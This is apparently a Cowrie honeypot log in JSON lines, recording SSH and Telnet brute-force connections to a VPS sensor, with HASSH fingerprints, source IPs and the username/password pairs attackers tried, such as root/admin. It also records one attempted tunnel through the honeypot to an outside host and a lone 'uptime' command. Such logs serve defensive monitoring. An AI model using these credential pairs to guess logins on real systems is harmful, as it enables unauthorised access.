{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T16:38:13.236940Z","src_ip":"212.227.125.160","session":"a3cf03bd6c83"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:38:13.589025Z","src_ip":"212.227.125.160","session":"a3cf03bd6c83"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T16:38:13.706217Z","session":"a3cf03bd6c83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60094,"dst_ip":"1.2.3.4","dst_port":22,"session":"32a98cbdc568","protocol":"ssh","message":"New connection: 212.227.235.229:60094 (1.2.3.4:22) [session: 32a98cbdc568]","sensor":"my-vps","timestamp":"2025-08-28T16:38:27.725314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:38:27.726431Z","src_ip":"212.227.235.229","session":"32a98cbdc568"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:38:27.828363Z","src_ip":"212.227.235.229","session":"32a98cbdc568"}
{"eventid":"cowrie.login.failed","username":"solv","password":"1234567","message":"login attempt [solv/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T16:38:28.278973Z","src_ip":"212.227.235.229","session":"32a98cbdc568"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:38:29.383671Z","src_ip":"212.227.235.229","session":"32a98cbdc568"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:39:23.120403Z","src_ip":"212.227.125.160","session":"a3cf03bd6c83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"102b3e469d55","protocol":"ssh","message":"New connection: 212.227.235.229:6103 (1.2.3.4:22) [session: 102b3e469d55]","sensor":"my-vps","timestamp":"2025-08-28T16:39:58.416728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T16:39:58.517159Z","src_ip":"212.227.235.229","session":"102b3e469d55"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T16:39:58.603718Z","src_ip":"212.227.235.229","session":"102b3e469d55"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T16:40:01.232657Z","src_ip":"212.227.235.229","session":"102b3e469d55"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:40:01.234815Z","src_ip":"212.227.235.229","session":"102b3e469d55"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53798,"dst_ip":"1.2.3.4","dst_port":22,"session":"10909f4f6b4d","protocol":"ssh","message":"New connection: 217.72.205.35:53798 (1.2.3.4:22) [session: 10909f4f6b4d]","sensor":"my-vps","timestamp":"2025-08-28T16:40:31.987270Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:40:31.988474Z","src_ip":"217.72.205.35","session":"10909f4f6b4d"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":40830,"dst_ip":"1.2.3.4","dst_port":23,"session":"75c1db8f2cdc","protocol":"telnet","message":"New connection: 79.124.8.120:40830 (1.2.3.4:23) [session: 75c1db8f2cdc]","sensor":"my-vps","timestamp":"2025-08-28T16:40:46.643269Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:40:46.683014Z","src_ip":"79.124.8.120","session":"75c1db8f2cdc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:40:46.699128Z","src_ip":"79.124.8.120","session":"75c1db8f2cdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59282,"dst_ip":"1.2.3.4","dst_port":23,"session":"baba4ec63411","protocol":"telnet","message":"New connection: 212.227.125.160:59282 (1.2.3.4:23) [session: baba4ec63411]","sensor":"my-vps","timestamp":"2025-08-28T16:41:16.207743Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:41:16.292338Z","src_ip":"212.227.125.160","session":"baba4ec63411"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:41:16.753925Z","src_ip":"212.227.125.160","session":"baba4ec63411"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54922,"dst_ip":"1.2.3.4","dst_port":23,"session":"bee9d3db02db","protocol":"telnet","message":"New connection: 212.227.235.229:54922 (1.2.3.4:23) [session: bee9d3db02db]","sensor":"my-vps","timestamp":"2025-08-28T16:41:19.341472Z"}
{"eventid":"cowrie.session.closed","duration":1.8012638092041016,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:41:21.142717Z","src_ip":"212.227.235.229","session":"bee9d3db02db"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":36829,"dst_ip":"1.2.3.4","dst_port":22,"session":"5de6a40f0f41","protocol":"ssh","message":"New connection: 186.225.142.90:36829 (1.2.3.4:22) [session: 5de6a40f0f41]","sensor":"my-vps","timestamp":"2025-08-28T16:42:03.487650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:42:03.489223Z","src_ip":"186.225.142.90","session":"5de6a40f0f41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T16:42:03.683094Z","src_ip":"186.225.142.90","session":"5de6a40f0f41"}
{"eventid":"cowrie.login.success","username":"root","password":"101010%#","message":"login attempt [root/101010%#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:42:04.462345Z","src_ip":"186.225.142.90","session":"5de6a40f0f41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:42:04.876612Z","src_ip":"186.225.142.90","session":"5de6a40f0f41"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T16:42:04.877360Z","src_ip":"186.225.142.90","session":"5de6a40f0f41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:42:05.071378Z","src_ip":"186.225.142.90","session":"5de6a40f0f41"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:42:05.072930Z","src_ip":"186.225.142.90","session":"5de6a40f0f41"}
{"eventid":"cowrie.session.connect","src_ip":"1.92.34.210","src_port":34602,"dst_ip":"1.2.3.4","dst_port":22,"session":"7da15cc57552","protocol":"ssh","message":"New connection: 1.92.34.210:34602 (1.2.3.4:22) [session: 7da15cc57552]","sensor":"my-vps","timestamp":"2025-08-28T16:42:29.872970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:42:29.873648Z","src_ip":"1.92.34.210","session":"7da15cc57552"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49640,"dst_ip":"1.2.3.4","dst_port":23,"session":"a1a24ee032b2","protocol":"telnet","message":"New connection: 212.227.125.160:49640 (1.2.3.4:23) [session: a1a24ee032b2]","sensor":"my-vps","timestamp":"2025-08-28T16:42:30.498903Z"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T16:42:30.778089Z","src_ip":"1.92.34.210","session":"7da15cc57552"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:42:37.873749Z","src_ip":"1.92.34.210","session":"7da15cc57552"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":9355,"dst_ip":"1.2.3.4","dst_port":22,"session":"f72622a57cc2","protocol":"ssh","message":"New connection: 80.94.95.15:9355 (1.2.3.4:22) [session: f72622a57cc2]","sensor":"my-vps","timestamp":"2025-08-28T16:42:53.397415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:42:53.398500Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:42:53.500633Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.login.failed","username":"user","password":"thompson","message":"login attempt [user/thompson] failed","sensor":"my-vps","timestamp":"2025-08-28T16:42:53.965913Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.login.failed","username":"user","password":"simba","message":"login attempt [user/simba] failed","sensor":"my-vps","timestamp":"2025-08-28T16:42:55.061217Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.login.failed","username":"user","password":"scream","message":"login attempt [user/scream] failed","sensor":"my-vps","timestamp":"2025-08-28T16:42:56.159655Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.login.failed","username":"user","password":"q1q1q1","message":"login attempt [user/q1q1q1] failed","sensor":"my-vps","timestamp":"2025-08-28T16:42:57.877286Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.login.failed","username":"user","password":"primus","message":"login attempt [user/primus] failed","sensor":"my-vps","timestamp":"2025-08-28T16:42:58.975509Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:43:00.076242Z","src_ip":"80.94.95.15","session":"f72622a57cc2"}
{"eventid":"cowrie.session.closed","duration":30.618444204330444,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:43:01.117277Z","src_ip":"212.227.125.160","session":"a1a24ee032b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48899,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f2b39e9dec5","protocol":"telnet","message":"New connection: 212.227.235.229:48899 (1.2.3.4:23) [session: 8f2b39e9dec5]","sensor":"my-vps","timestamp":"2025-08-28T16:43:33.814076Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23621,"dst_ip":"1.2.3.4","dst_port":23,"session":"95d6fbe1ffc6","protocol":"telnet","message":"New connection: 212.227.125.160:23621 (1.2.3.4:23) [session: 95d6fbe1ffc6]","sensor":"my-vps","timestamp":"2025-08-28T16:43:44.228250Z"}
{"eventid":"cowrie.session.closed","duration":12.542206048965454,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:43:46.356211Z","src_ip":"212.227.235.229","session":"8f2b39e9dec5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49208,"dst_ip":"1.2.3.4","dst_port":23,"session":"3062950eb4f6","protocol":"telnet","message":"New connection: 212.227.235.229:49208 (1.2.3.4:23) [session: 3062950eb4f6]","sensor":"my-vps","timestamp":"2025-08-28T16:43:46.612086Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:43:46.700714Z","src_ip":"79.124.8.120","session":"75c1db8f2cdc"}
{"eventid":"cowrie.session.closed","duration":180.06073307991028,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:43:46.703923Z","src_ip":"79.124.8.120","session":"75c1db8f2cdc"}
{"eventid":"cowrie.session.closed","duration":12.757134675979614,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:43:59.369126Z","src_ip":"212.227.235.229","session":"3062950eb4f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49531,"dst_ip":"1.2.3.4","dst_port":23,"session":"ddc5f7698913","protocol":"telnet","message":"New connection: 212.227.235.229:49531 (1.2.3.4:23) [session: ddc5f7698913]","sensor":"my-vps","timestamp":"2025-08-28T16:43:59.611993Z"}
{"eventid":"cowrie.session.closed","duration":12.739463806152344,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:12.351377Z","src_ip":"212.227.235.229","session":"ddc5f7698913"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49868,"dst_ip":"1.2.3.4","dst_port":23,"session":"eff8f469e0b5","protocol":"telnet","message":"New connection: 212.227.235.229:49868 (1.2.3.4:23) [session: eff8f469e0b5]","sensor":"my-vps","timestamp":"2025-08-28T16:44:12.615875Z"}
{"eventid":"cowrie.session.closed","duration":30.619356393814087,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:14.847507Z","src_ip":"212.227.125.160","session":"95d6fbe1ffc6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:16.757048Z","src_ip":"212.227.125.160","session":"baba4ec63411"}
{"eventid":"cowrie.session.closed","duration":180.5523717403412,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:16.760030Z","src_ip":"212.227.125.160","session":"baba4ec63411"}
{"eventid":"cowrie.session.connect","src_ip":"175.110.65.134","src_port":15913,"dst_ip":"1.2.3.4","dst_port":22,"session":"380a7ad6c9f6","protocol":"ssh","message":"New connection: 175.110.65.134:15913 (1.2.3.4:22) [session: 380a7ad6c9f6]","sensor":"my-vps","timestamp":"2025-08-28T16:44:22.186930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T16:44:22.187759Z","src_ip":"175.110.65.134","session":"380a7ad6c9f6"}
